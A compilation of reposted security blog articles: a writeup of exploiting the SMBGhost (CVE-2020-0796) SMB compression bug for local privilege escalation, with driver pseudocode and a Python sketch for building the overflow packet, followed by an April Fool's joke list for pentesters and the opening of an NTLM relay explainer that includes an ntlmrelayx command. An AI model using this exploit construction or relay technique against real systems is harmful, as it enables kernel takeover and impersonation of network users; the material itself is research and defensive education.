Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC
By ZecOps Research Team | March 31, 2020

Introduction

CVE-2020-0796 is a bug in the compression mechanism of SMBv3.1.1, also known as "SMBGhost". The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about three weeks ago. Once we heard about it, we skimmed over the details and created a quick POC (proof of concept) that demonstrates how the bug can be triggered remotely, without authentication, by causing a BSOD (Blue Screen of Death). A couple of days ago we returned to this bug, aiming for more than just a remote DoS. The Microsoft Security Advisory describes the bug as a remote code execution (RCE) vulnerability, but there is no public POC that demonstrates RCE through this bug.

Initial Analysis

The bug is an integer overflow in the Srv2DecompressData function of the srv2.sys SMB server driver. Here's a simplified version of the function, with the irrelevant details omitted:

01 typedef struct _COMPRESSION_TRANSFORM_HEADER
02 {
03     ULONG ProtocolId;
04     ULONG OriginalCompressedSegmentSize;
05     USHORT CompressionAlgorithm;
06     USHORT Flags;
07     ULONG Offset;
08 } COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;
09
10 typedef struct _ALLOCATION_HEADER
11 {
12     // ...
13     PVOID UserBuffer;
14     // ...
15 } ALLOCATION_HEADER, *PALLOCATION_HEADER;
16
17 NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
18 {
19     PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
20         (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
21         NULL);
22     if (!Alloc) {
23         return STATUS_INSUFFICIENT_RESOURCES;
24     }
25
26     ULONG FinalCompressedSize = 0;
27
28     NTSTATUS Status = SmbCompressionDecompress(
29         Header->CompressionAlgorithm,
30         (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
31         (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
32         (PUCHAR)Alloc->UserBuffer + Header->Offset,
33         Header->OriginalCompressedSegmentSize,
34         &FinalCompressedSize);
35     if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
36         SrvNetFreeBuffer(Alloc);
37         return STATUS_BAD_DATA;
38     }
39
40     if (Header->Offset > 0) {
41         memcpy(
42             Alloc->UserBuffer,
43             (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
44             Header->Offset);
45     }
46
47     Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
48     return STATUS_SUCCESS;
49 }

The Srv2DecompressData function receives the compressed message sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data placed before the compressed data, as is, to the beginning of the allocated buffer. If we look carefully, we can notice that lines 20 and 31 can lead to an integer overflow for certain inputs. For example, most POCs that appeared shortly after the bug's publication, and that crash the system, just use the value 0xFFFFFFFF for the Offset field. Using 0xFFFFFFFF triggers an integer overflow on line 20, and as a result fewer bytes are allocated. Later, it triggers an additional integer overflow on line 31. The crash happens due to a memory access at the address calculated on line 30, far away from the received message.
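To make the 32-bit arithmetic concrete, here is a small standalone Python illustration (ours, not from the original writeup; the addresses are made up):

# ULONG is 32 bits, so the size passed to SrvNetAllocateBuffer (line 20) wraps:
offset = 0xFFFFFFFF                       # attacker-controlled Offset field
orig = 0x100                              # OriginalCompressedSegmentSize
print(hex((orig + offset) & 0xFFFFFFFF))  # 0xff: far fewer bytes than needed

# and the source pointer on line 30 ends up ~4 GiB past the message:
header_addr = 0x1000                      # pretend address of the received message
print(hex(header_addr + 16 + offset))     # 0x10000100f, far away from the message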
If the code had validated these computations, it would have bailed out early: with such an Offset, the subtraction on line 31 underflows (the real length is negative and cannot be represented in a ULONG), and the source address computed on line 30 is invalid as well.

Choosing what to overflow

There are only two relevant fields that we can control to cause an integer overflow: OriginalCompressedSegmentSize and Offset, so there aren't that many options. After trying several combinations, the following one caught our eye: what if we send a legit Offset value and a huge OriginalCompressedSegmentSize value? Let's go over the three steps the code is going to execute:

Allocate: The amount of allocated bytes will be smaller than the sum of both fields due to the integer overflow.
Decompress: The decompression will receive a huge OriginalCompressedSegmentSize value, treating the target buffer as having practically limitless size. All other parameters are unaffected, so it will work as expected.
Copy: If it's ever going to be executed (will it?), the copy will work as expected.

Whether or not the Copy step is going to be executed, this already looks interesting: we can trigger an out-of-bounds write during the Decompress stage, since we managed to allocate fewer bytes than necessary during the Allocate stage. As you can see, using this technique we can trigger an overflow of any size and content, which is a great start. But what is located beyond our buffer? Let's find out!

Diving into SrvNetAllocateBuffer

To answer this question, we need to look at the allocation function, in our case SrvNetAllocateBuffer. Here is the interesting part of the function:

PALLOCATION_HEADER SrvNetAllocateBuffer(SIZE_T AllocSize, PALLOCATION_HEADER SourceBuffer)
{
    // ...

    if (SrvDisableNetBufferLookAsideList || AllocSize > 0x100100) {
        if (AllocSize > 0x1000100) {
            return NULL;
        }
        Result = SrvNetAllocateBufferFromPool(AllocSize, AllocSize);
    } else {
        int LookasideListIndex = 0;
        if (AllocSize > 0x1100) {
            LookasideListIndex = /* some calculation based on AllocSize */;
        }

        SOME_STRUCT list = SrvNetBufferLookasides[LookasideListIndex];
        Result = /* fetch result from list */;
    }

    // Initialize some Result fields...

    return Result;
}

We can see that the allocation function does different things depending on the required amount of bytes. Large allocations (larger than about 16 MB) just fail. Medium allocations (larger than about 1 MB) use the SrvNetAllocateBufferFromPool function. Small allocations (the rest) use lookaside lists as an optimization.

Note: There's also the SrvDisableNetBufferLookAsideList flag which can affect the behavior of the function, but it's set by an undocumented registry setting and is disabled by default, so it's not very interesting.

Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver. One of the capabilities of lookaside lists is to define custom allocation/free functions for managing the buffers. Looking at references to the SrvNetBufferLookasides array, we found that it's initialized in the SrvNetCreateBufferLookasides function, and by looking at it we learned the following: the custom allocation function is defined as SrvNetBufferLookasideAllocate, which just calls SrvNetAllocateBufferFromPool.
9 lookaside lists are created with the following sizes, as we quickly calculated with Python:

>>> [hex((1 << (i + 12)) + 256) for i in range(9)]
['0x1100', '0x2100', '0x4100', '0x8100', '0x10100', '0x20100', '0x40100', '0x80100', '0x100100']

This matches our finding that allocations larger than 0x100100 bytes are allocated without using lookaside lists. The conclusion is that every allocation request ends up in the SrvNetBufferLookasideAllocate function, so let's take a look at it.

SrvNetBufferLookasideAllocate and the allocated buffer layout

The SrvNetBufferLookasideAllocate function allocates a buffer in the NonPagedPoolNx pool using the ExAllocatePoolWithTag function, and then fills some of the structures with data. (A figure in the original post shows the layout of the allocated buffer.) The only parts of this layout relevant to our research are the user buffer and the ALLOCATION_HEADER struct, which follows the user buffer in memory. We can see right away that by overflowing the user buffer, we end up overriding the ALLOCATION_HEADER struct. Looks very convenient.

Overriding the ALLOCATION_HEADER struct

Our first thought at this point was that, due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

SrvNetFreeBuffer would be called and the function would fail, since we crafted OriginalCompressedSegmentSize to be a huge number, and FinalCompressedSize was going to be a smaller number representing the actual amount of decompressed bytes. So we analyzed the SrvNetFreeBuffer function, managed to replace the allocation pointer with a magic number, and waited for the free function to try to free it, hoping to leverage that later for a use-after-free or similar. But to our surprise, we got a crash in the memcpy function. That made us happy, since we hadn't expected to get there at all, but we had to check why it happened. The explanation can be found in the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (Status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

Basically, if the decompression succeeds, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. This deliberate update of the FinalCompressedSize return value seemed quite suspicious to us, since this little detail, together with the allocated buffer layout, allows for a very convenient exploitation of this bug. Since execution continues to the stage of copying the raw data, let's review the call once again:

memcpy(
    Alloc->UserBuffer,
    (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
    Header->Offset);

The target address is read from the ALLOCATION_HEADER struct, the one we can override. The content and the size of the copy are controlled by us as well. Jackpot! Write-what-where in the kernel, remotely!

Remote write-what-where implementation

We did a quick implementation of a write-what-where CVE-2020-0796 exploit in Python, based on the CVE-2020-0796 DoS POC by maxpl0it. The code is fairly short and straightforward.
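To illustrate the shape of such a message, here is a hedged sketch of ours (the field layout follows the COMPRESSION_TRANSFORM_HEADER struct shown earlier; the lznt1_compress helper is assumed, e.g. borrowed from an existing POC):

import struct

LZNT1 = 0x0001

def compression_transform_header(original_size, algorithm, offset):
    # ProtocolId "\xfcSMB" | OriginalCompressedSegmentSize | CompressionAlgorithm | Flags | Offset
    return b'\xfcSMB' + struct.pack('<IHHI', original_size, algorithm, 0, offset)

what = b'A' * 8     # the "what": raw bytes placed before the compressed data
offset = len(what)  # Offset = len(what), so the final memcpy copies them
                    # to the (overwritten) Alloc->UserBuffer pointer
huge = 0xFFFFFFFF - offset + 0x1100  # line 20 wraps: allocation of only 0x10ff bytes
header = compression_transform_header(huge, LZNT1, offset)

# payload = header + what + lznt1_compress(overflow_data)
# where overflow_data overruns the undersized buffer and overwrites the
# ALLOCATION_HEADER's UserBuffer field with the "where" address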
Local Privilege Escalation

Now that we have the write-what-where exploit, what can we do with it? Obviously, we can crash the system. We might be able to trigger remote code execution, but we haven't found a way to do that yet. If we use the exploit on localhost and leak additional information, we can use it for local privilege escalation, as has already been demonstrated via several techniques.

The first technique we tried was proposed by Morten Schenk in his Black Hat USA 2017 talk. It involves overriding a function pointer in the .data section of the win32kbase.sys driver, and then calling the appropriate function from user mode to gain code execution. j00ru wrote a great writeup about using this technique in WCTF 2018, and provided his exploit source code. We adjusted it for our write-what-where exploit, but found out that it doesn't work, since the thread that handles the SMB messages is not a GUI thread. Because of this, win32kbase.sys is not mapped, and the technique is not applicable (unless there's a way to make it a GUI thread, something we didn't research).

We ended up using the well-known technique covered by cesarcer in his 2012 Black Hat presentation, Easy Local Windows Kernel Exploitation. The technique consists of leaking the current process token address using the NtQuerySystemInformation(SystemHandleInformation) API, and then overriding it, granting the current process token privileges that can then be used for privilege escalation. The Abusing Token Privileges For EoP research by Bryan Alexander (dronesec) and Stephen Breen (breenmachine) (2017) demonstrates several ways of using various token privileges for privilege escalation. We based our exploit on the code that Alexandre Beaulieu kindly shared in his Exploiting an Arbitrary Write to Escalate Privileges writeup. After modifying our process' token privileges, we completed the privilege escalation by injecting a DLL into winlogon.exe. The DLL's whole purpose is to launch a privileged instance of cmd.exe. Our complete Local Privilege Escalation Proof of Concept can be found here and is available for research / defensive purposes only.

Summary

We managed to demonstrate that the CVE-2020-0796 vulnerability can be exploited for local privilege escalation. Note that our exploit is limited to medium integrity level, since it relies on API calls that are unavailable at a lower integrity level. Can we do more than that? Maybe, but it will require more research. There are many other fields that we can override in the allocated buffer; perhaps one of them can help us achieve other interesting things, such as remote code execution.

POC Source Code

Remediation

We recommend updating servers and endpoints to the latest Windows version to remediate this vulnerability. If possible, block port 445 until updates are deployed. Regardless of CVE-2020-0796, we recommend enabling host isolation where possible. It is also possible to disable SMBv3.1.1 compression to avoid triggering this bug; however, we recommend a full update instead, if possible.

Sursa: https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
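As an addendum to the Remediation section above: Microsoft's documented workaround (ADV200005) is the DisableCompression registry value. A minimal Python sketch of applying it (ours; Windows only, run as Administrator):

import winreg

key = winreg.CreateKeyEx(
    winreg.HKEY_LOCAL_MACHINE,
    r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
    0, winreg.KEY_SET_VALUE)
# 1 disables SMBv3.1.1 compression, removing the trigger for CVE-2020-0796
winreg.SetValueEx(key, "DisableCompression", 0, winreg.REG_DWORD, 1)
winreg.CloseKey(key)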
-
Top 12 tips every pentester should know
April 1, 2020

In 2020, big and small companies alike are embracing pen-testing as a solution to ensure the quality and availability of their mission-critical communication systems and data storage. Detectify Crowdsource is our private bug bounty community that's powering our automated web security scanners to protect 1000s of security teams. It's true that bug bounty hunters and pen-testers are not the same breed, yet we see a lot of our hackers learning new skills to break into the pen-testing scene and help keep out hackers with hats as black as ink.

Detectify security researcher Fredrik N. Almroth shares his thoughts on the growing interest in pen-testing: "As a researcher, I see a lot of mistakes that can be avoided out in the wild, such as unauthorized access to things in the supply chain and obvious tampering marks in the data. Year after year, companies have 2 options with pentesting: they can be proactive with testing business assets, or react once everything suddenly breaks at once. If you have the resources, bringing in pentesting can help companies stay on top of risks and get results before the ink is even dry on the auditing contract."

While there are differences in what they do, there are also a lot of similarities. So we asked the Detectify Crowdsource community, some of whom have even hacked the Pentagon, to share some of their top-paying tips that every great pen-tester should know:

Top 12 tips every pen-tester should know:

#12 @gehaxelt: "I don't think people know what true pen-testing really is. It's all about documentation, and the writing between the lines."
#11 @p4fg: "Find your niche. When it comes to pentesting, I've found it to be more lucrative to become an expert on fountain pens than being a jack-of-all-pens."
#10 @peterjaric: "Know when to move on. As Einstein said: 'Insanity is doing the same thing over and over again, but expecting different results.' It's the same with testing pens."
#9 @streaak: "It's fierce competition out there, but do what's going to get you paid, and not in the penitentiary."
#8 @ozgur_bbh: "Always carry a pineapple."
#7 @0xLerhan: "Be creative and test where others don't dare to test. The best results come where others aren't looking."
#6 @alxbrsn: "Communicate business impact."
#5 @mahajan344: "Don't lose track of the scope. It's easy to get sucked in by pencils because they have erasers, but you're really there for the pens."
#4 @ErwinGeirnaert: "Wash your hands before and after testing, you don't know how many hands have handled it."
#3 @JR0ch17: "My favourite command is `curl -pen http://google.com`"
#2 @JLLeitschuh: "We'll all probably get carpal tunnel one day, but you can delay it if you automate all the repetitive tasks… like knowing the half-life of its ink."
#1 @tomnomnom: "Put pen to paper and share what you found with the community. Embrace the twitter fame."

As mentioned, our community applies these tips already today, and we've had great progress updates, including from researcher @tareksiddiki: "Following these tips has helped me keep my eyes on the ball, and I've pointed out numerous flaws to my clients, helping them cross their t's and dot their i's. It's really helped me put a feather in my cap as a pen-tester!"

There you have it, some top-paying pen-testing tips from Detectify Crowdsource hackers. Now it's time to get out there and get your next gig. Happy pen-testing!

Happy April Fool's Day!

Sursa: https://blog.detectify.com/2020/04/01/top-pen-testing-tips-detectify-crowdsource/
-
NTLM Relay
01 Apr 2020 · 47 min
Author: Pixis
Active Directory, Windows

In this post:
» Preliminary
» Introduction
» NTLM Relay
» In practice
» Authentication vs Session
» Session signing
» Authentication signing (MIC)
» Session key
» Channel Binding
» What can be relayed?
» Stop. Using. NTLMv1.
» Conclusion

NTLM relay is a technique that consists of standing between a client and a server to perform actions on the server while impersonating the client. It can be very powerful and can be used to take control of an Active Directory domain from a black box context (no credentials). The purpose of this article is to explain NTLM relay and to present its limits.

Preliminary

This article is not meant to be a tutorial to follow in order to carry out a successful attack, but it will allow the reader to understand in detail the technical workings of this attack and its limitations, and it can be a basis for developing your own tools or understanding how current tools work. In addition, and to avoid confusion, here are some reminders:

The NT hash and LM hash are hashed versions of user passwords. LM hashes are totally obsolete and will not be mentioned in this article. The NT hash is commonly, and in my opinion wrongly, called the "NTLM hash". This designation is confusing with the protocol name, NTLM. Thus, when we talk about the user's password hash, we will refer to it as the NT hash.
NTLM is therefore the name of the authentication protocol. It also exists in version 2. In this article, if the version affects the explanation, then NTLMv1 and NTLMv2 will be the terms used. Otherwise, the term NTLM will be used to cover all versions of the protocol.
NTLMv1 hash and NTLMv2 hash will be the terminology used to refer to the challenge response sent by the client, for versions 1 and 2 of the NTLM protocol.
Net-NTLMv1 and Net-NTLMv2 are pseudo-terminologies used when the NT hash is called the NTLM hash, in order to distinguish that hash from the protocol. Since we do not use the NTLM hash terminology, these two terms will not be used.
Net-NTLMv1 hash and Net-NTLMv2 hash are also terminologies meant to avoid confusion, but they will not be used in this article either.

Introduction

NTLM relay relies, as its name implies, on NTLM authentication. The basics of NTLM were presented in the pass-the-hash article. I invite you to read at least the part about the NTLM protocol and local and remote authentication. As a reminder, the NTLM protocol is used to authenticate a client to a server. What we call client and server are the two parties of the exchange: the client is the one that wishes to authenticate, and the server is the one that validates this authentication.

This authentication takes place in 3 steps:

First, the client tells the server that it wants to authenticate.
The server then responds with a challenge, which is nothing more than a random sequence of characters.
The client encrypts this challenge with its secret, and sends the result back to the server. This is its response.

This process is called challenge/response. The advantage of this exchange is that the user's secret never crosses the network. This is known as zero-knowledge proof.

NTLM Relay

With this information, we can easily imagine the following scenario: an attacker manages to get into a man-in-the-middle position between a client and a server, and simply relays information from one to the other.
The man-in-the-middle position means that from the client's point of view, the attacker's machine is the server it wants to authenticate to, and from the server's point of view, the attacker is a client like any other that wants to authenticate. Except that the attacker does not "just" want to authenticate to the server: he wishes to do so while pretending to be the client. However, he does not know the client's secret, and even if he listens to the conversation, since this secret is never transmitted over the network (zero-knowledge proof), he is not able to extract it. So, how does it work?

Message Relaying

During NTLM authentication, a client can prove its identity to a server by encrypting, with its password, some piece of information provided by the server. So the only thing the attacker has to do is let the client do its work, passing the messages from the client to the server and the replies from the server back to the client. Everything the client sends to the server, the attacker receives and forwards to the real server, and every message the server sends to the client, the attacker also receives and forwards to the client, as is. And it all works out!

Indeed, from the client's point of view, on the left side of the diagram, an NTLM authentication takes place between the attacker and the client, with all the necessary building blocks. The client sends a negotiate request in its first message, to which the attacker replies with a challenge. Upon receiving this challenge, the client builds its response using its secret, and finally sends the last authentication message containing the encrypted challenge.

OK, that's great, but the attacker cannot do anything with this exchange alone. Fortunately, there is the right side of the diagram. From the server's point of view, the attacker is a client like any other. He sent a first message to ask for authentication, and the server responded with a challenge. As the attacker sent this same challenge to the real client, the real client encrypted it with its secret and responded with a valid answer. The attacker can therefore send this valid response to the server. This is where the interest of this attack lies. From the server's point of view, the attacker has authenticated himself using the victim's secret, transparently to the server: the server has no idea that the attacker was replaying its messages to the client in order to get the client to produce the right answers. At the end of these exchanges, the attacker is authenticated on the server with the client's credentials.

Net-NTLMv1 and Net-NTLMv2

For information, it is this valid response relayed by the attacker in message 3, the encrypted challenge, that is commonly called the Net-NTLMv1 hash or Net-NTLMv2 hash. But in this article, it will be called the NTLMv1 hash or NTLMv2 hash, as indicated in the preliminary paragraph. To be exact, this is not exactly an encrypted version of the challenge, but a hash that uses the client's secret; for NTLMv2, it is the HMAC_MD5 function that is used, for example. This type of hash can only be broken by brute force. The cryptography involved in computing the NTLMv1 hash is obsolete, and the NT hash used to create it can be recovered very quickly. For NTLMv2, on the other hand, it takes much longer.
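For reference, here is a minimal Python sketch of ours of the NTLMv2 computation described above (following MS-NLMP; note that MD4 may require OpenSSL's legacy provider on recent systems):

import hashlib, hmac

def ntowf_v2(password, user, domain):
    # NT hash = MD4(UTF-16LE(password))
    nt_hash = hashlib.new('md4', password.encode('utf-16le')).digest()
    return hmac.new(nt_hash, (user.upper() + domain).encode('utf-16le'),
                    hashlib.md5).digest()

def ntlmv2_response(password, user, domain, server_challenge, blob):
    # NtProofStr = HMAC_MD5(key, challenge + blob); the blob carries the
    # timestamp, client challenge and AV pairs (msAvFlags, SPN, CBT, ...)
    key = ntowf_v2(password, user, domain)
    nt_proof_str = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return nt_proof_str + blob

The NTLMv1 equivalent replaces this HMAC_MD5 construction with DES operations keyed directly by the NT hash, which is why it falls so quickly to brute force.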
It is therefore preferable and advisable not to allow NTLMv1 authentication on a production network.

In practice

As an example, I set up a small lab with several machines: the client DESKTOP01 with IP address 192.168.56.221 and the server WEB01 with IP address 192.168.56.211. My host is the attacker, with IP address 192.168.56.1. So we are in the following situation:

The attacker has managed to put himself in a man-in-the-middle position. There are different techniques to achieve this, whether through abuse of default IPv6 configurations in a Windows environment or through the LLMNR and NBT-NS protocols. Either way, the attacker makes the client think that he is the server. Thus, when the client tries to authenticate, it is with the attacker that it performs this operation. The tool I used to perform this attack is ntlmrelayx from impacket. This tool is presented in detail in this article by Agsolino, impacket's (almighty) developer.

ntlmrelayx.py -t 192.168.56.211

The tool sets up different servers, including an SMB server for this example. If it receives a connection on this server, it relays it to the provided target, the WEB01 server (192.168.56.211) in this example. From a network point of view, here is a capture of the exchange, with the attacker relaying the information to the target. In green are the exchanges between the DESKTOP01 client and the attacker, and in red the exchanges between the attacker and the WEB01 server. We can clearly see the 3 NTLM messages between DESKTOP01 and the attacker, and between the attacker and the WEB01 server. And to understand the notion of relay, we can verify that when WEB01 sends a challenge to the attacker, the attacker sends back exactly the same thing to DESKTOP01.

Here is the challenge sent by WEB01 to the attacker. When the attacker receives this challenge, he sends it to DESKTOP01 without any modification. In this example, the challenge is b6515172c37197b0. The client then computes the response using its secret, as we saw in the previous paragraphs, and sends its response along with its username (jsnow), its hostname (DESKTOP01) and, since in this example it is a domain user, the domain name (ADSEC). The attacker who gets all that doesn't ask questions: he sends the exact same information to the server. So he pretends to be jsnow on DESKTOP01, part of the ADSEC domain, and he also sends the response computed by the client, called NTLM Response in these screenshots. We call this response the NTLMv2 hash. We can see that the attacker was only relaying: he just passed the information from the client to the server and vice versa, except that in the end, the server thinks that the attacker is successfully authenticated, and the attacker can then perform actions on the server on behalf of ADSEC\jsnow.

Authentication vs Session

Now that we have understood the basic principle of NTLM relay, the question is: how, concretely, can we perform actions on a server after relaying an NTLM authentication? By the way, what do we mean by "actions"? What is it possible to do? To answer this question, we must first clarify one fundamental thing. When a client authenticates to a server to do something, we must distinguish two things:

Authentication, allowing the server to verify that the client is who it claims to be.
The session, during which the client will be able to perform actions.
Thus, if the client has authenticated correctly, it will then be able to access the resources offered by the server, such as network shares, an LDAP directory, an HTTP server or a SQL database. This list is obviously not exhaustive. To manage these two steps, the protocol in use must be able to encapsulate the authentication, that is, the exchange of NTLM messages. Of course, if every protocol had to integrate NTLM's technical details, it would quickly become a holy mess. That's why Microsoft provides an interface that can be relied on to handle authentication, and packages have been specially developed to handle different types of authentication.

SSPI & NTLMSSP

The SSPI interface, or Security Support Provider Interface, is an interface provided by Microsoft to standardize authentication, regardless of the type of authentication used. Different packages can plug into this interface to handle different types of authentication. In our case, it is the NTLMSSP package (NTLM Security Support Provider) that interests us, but there is also a package for Kerberos authentication, for example. Without going into details, the SSPI interface provides several functions, including AcquireCredentialsHandle, InitializeSecurityContext and AcceptSecurityContext. During NTLM authentication, both the client and the server use these functions. The steps are only briefly described here:

The client calls AcquireCredentialsHandle in order to gain indirect access to the user's credentials.
The client then calls InitializeSecurityContext, a function which, when called for the first time, creates a message of type 1, thus of type NEGOTIATE. We know this because we're interested in NTLM, but for a programmer, it doesn't matter what this message is. All that matters is to send it to the server.
The server, when receiving the message, calls the AcceptSecurityContext function. This function creates the type 2 message, the CHALLENGE.
When receiving this message, the client calls InitializeSecurityContext again, this time passing the CHALLENGE as an argument. The NTLMSSP package takes care of computing the response by encrypting the challenge, and produces the last message, AUTHENTICATE.
Upon receiving this last message, the server calls AcceptSecurityContext once more, and the authentication verification is performed automatically.

The reason these steps are explained is to show that in reality, from the client's or server's point of view, the structure of the 3 messages that are exchanged does not matter. We, with our knowledge of the NTLM protocol, know what these messages correspond to, but the client and the server don't care. These messages are described in the Microsoft documentation as opaque tokens. This means that these 5 steps are completely independent of the type of client or server. They work regardless of the protocol, as long as the protocol has something in place to allow this opaque structure to be exchanged, one way or another, from the client to the server. So protocols have adapted to find a way to put an NTLMSSP, Kerberos or other authentication structure into a specific field, and if the client or server sees data in that field, it just passes it to InitializeSecurityContext or AcceptSecurityContext. This point is quite important, since it clearly shows that the application layer (HTTP, SMB, SQL, …) is completely independent from the authentication layer (NTLM, Kerberos, …).
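To see these opaque tokens in action, here is a small sketch of ours using the SSPI bindings shipped with pywin32 (Windows only; both sides run in one process with the current user's credentials):

from sspi import ClientAuth, ServerAuth  # pip install pywin32

client = ClientAuth('NTLM')  # wraps AcquireCredentialsHandle / InitializeSecurityContext
server = ServerAuth('NTLM')  # wraps AcceptSecurityContext

err, negotiate = client.authorize(None)                    # type 1: NEGOTIATE
err, challenge = server.authorize(negotiate[0].Buffer)     # type 2: CHALLENGE
err, authenticate = client.authorize(challenge[0].Buffer)  # type 3: AUTHENTICATE
err, _ = server.authorize(authenticate[0].Buffer)          # verification
print('authentication completed, err =', err)

Neither side here cares that the buffers are NTLM messages; they are shuttled as opaque blobs, which is exactly why an attacker can carry them over any protocol.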
Therefore, security measures are needed both at the authentication layer and at the application layer. For a better understanding, we will look at two examples of application protocols: SMB and HTTP. It's quite easy to find documentation for other protocols; it's always the same principle.

Integration with HTTP

This is what a basic HTTP request looks like:

GET /index.html HTTP/1.1
Host: beta.hackndo.com
User-Agent: Mozilla/5.0
Accept: text/html
Accept-Language: fr

The mandatory elements in this example are the HTTP verb (GET), the path to the requested page (/index.html), the protocol version (HTTP/1.1) and the Host header (Host: beta.hackndo.com). But it is quite possible to add other arbitrary headers. At best, the remote server is aware of these headers and knows how to handle them; at worst, it ignores them. This allows the same request to carry some additional information:

GET /index.html HTTP/1.1
Host: beta.hackndo.com
User-Agent: Mozilla/5.0
Accept: text/html
Accept-Language: en
X-Name: pixis
Favorite-Food: Beer 'coz yes, beer is food

It is this feature that is used to transfer NTLM messages from the client to the server. It has been decided that the client sends its messages in a header called Authorization, and the server in a header called WWW-Authenticate. If a client attempts to access a web site requiring authentication, the server responds by adding the WWW-Authenticate header, listing the different authentication mechanisms it supports. For NTLM, it simply says NTLM. The client, knowing that NTLM authentication is required, sends the first message in the Authorization header, encoded in base64 because the message does not contain only printable characters. The server responds with a challenge in the WWW-Authenticate header; the client computes the response and sends it in Authorization. If authentication is successful, the server usually returns a 200 status code indicating that everything went well.

> GET /index.html HTTP/1.1
> Host: beta.hackndo.com
> User-Agent: Mozilla/5.0
> Accept: text/html
> Accept-Language: en

< HTTP/1.1 401 Unauthorized
< WWW-Authenticate: NTLM
< Content-Type: text/html
< Content-Length: 0

> GET /index.html HTTP/1.1
> Host: beta.hackndo.com
> User-Agent: Mozilla/5.0
> Accept: text/html
> Accept-Language: en
=> Authorization: NTLM <NEGOTIATE in base64>

< HTTP/1.1 401 Unauthorized
=> WWW-Authenticate: NTLM <CHALLENGE in base64>
< Content-Type: text/html
< Content-Length: 0

> GET /index.html HTTP/1.1
> Host: beta.hackndo.com
> User-Agent: Mozilla/5.0
> Accept: text/html
> Accept-Language: en
=> Authorization: NTLM <RESPONSE in base64>

< HTTP/1.1 200 OK
< Content-Type: text/html
< Content-Length: 0
< Connection: close

As long as the TCP session is open, authentication remains effective. As soon as the session closes, however, the server no longer has the client's security context, and a new authentication has to take place. This can happen often, and thanks to Microsoft's SSO (Single Sign-On) mechanisms, it is usually transparent to the user.

Integration with SMB

Let's take another example frequently encountered on a company network: the SMB protocol, used to access network shares, among other things. The SMB protocol works with commands. They are documented by Microsoft, and there are many of them. For example, there are the SMB_COM_OPEN, SMB_COM_CLOSE and SMB_COM_READ commands, used to open, close or read a file.
SMB also has a command dedicated to setting up an SMB session, and this command is SMB_COM_SESSION_SETUP_ANDX. Two fields of this command are dedicated to the contents of the NTLM messages:

LM/LMv2 authentication: OEMPassword
NTLM/NTLMv2 authentication: UnicodePassword

What is important to remember is that there is a specific SMB command with an allocated field for NTLM messages. The original post shows an example of an SMB packet containing a server's response during authentication.

These two examples show that the content of NTLM messages is protocol-independent. It can be included in any protocol that supports it. It is then very important to clearly distinguish the authentication part, i.e. the NTLM exchanges, from the application part, or session part, which is the continuation of the exchanges via the protocol in use once the client is authenticated, such as browsing a website via HTTP or accessing files on a network share via SMB. As this information is independent, it means that a man-in-the-middle may very well receive an authentication via HTTP, for example, and relay it to a server using SMB. This is called cross-protocol relay. With all these aspects in mind, the following chapters will highlight the various weaknesses that exist or have existed, and the security mechanisms that come into play to address them.

Session signing

Principle

A signature is a method of verifying authenticity, ensuring that an item has not been tampered with between sending and receiving. For example, if the user jdoe sends the text "I love hackndo" and digitally signs this document, then anyone who receives the document and its signature can verify that it was jdoe who edited it, and can be assured that he wrote this sentence and not another, since the signature guarantees that the document has not been modified. The signature principle can be applied to any exchange, as long as the protocol supports it. This is the case for SMB, LDAP and even HTTP, for example. In practice, the signing of HTTP messages is rarely implemented.

But then, what's the point of signing packets? Well, as discussed earlier, session and authentication are two separate steps when a client wants to use a service. Since an attacker can be in a man-in-the-middle position and relay authentication messages, he can impersonate the client when talking to the server. This is where signing comes into play. Even if the attacker has managed to authenticate to the server as the client, he will not be able to sign packets, regardless of the authentication. Indeed, in order to sign a packet, one must know the client's secret. In an NTLM relay, the attacker pretends to be a client whose secret he does not know; he is therefore unable to sign anything on the client's behalf. Since he can't sign any packet, the server will see either that the signature is missing or that it is invalid, and will reject the attacker's requests. So you understand that if packets must be signed after authentication, the attacker can no longer operate, since he has no knowledge of the client's secret. The attack will fail. This is a very effective measure against NTLM relay.

That's all very well, but how do the client and the server agree on whether or not to sign packets? Well, that's a very good question. Yes, I know, I'm the one asking it, but that doesn't make it irrelevant.
There are two things that come into play here. The first one indicates whether signing is supported; this happens during the NTLM negotiation. The second one indicates whether signing is required, optional or disabled; this is a setting configured on the client and server side.

NTLM Negotiation

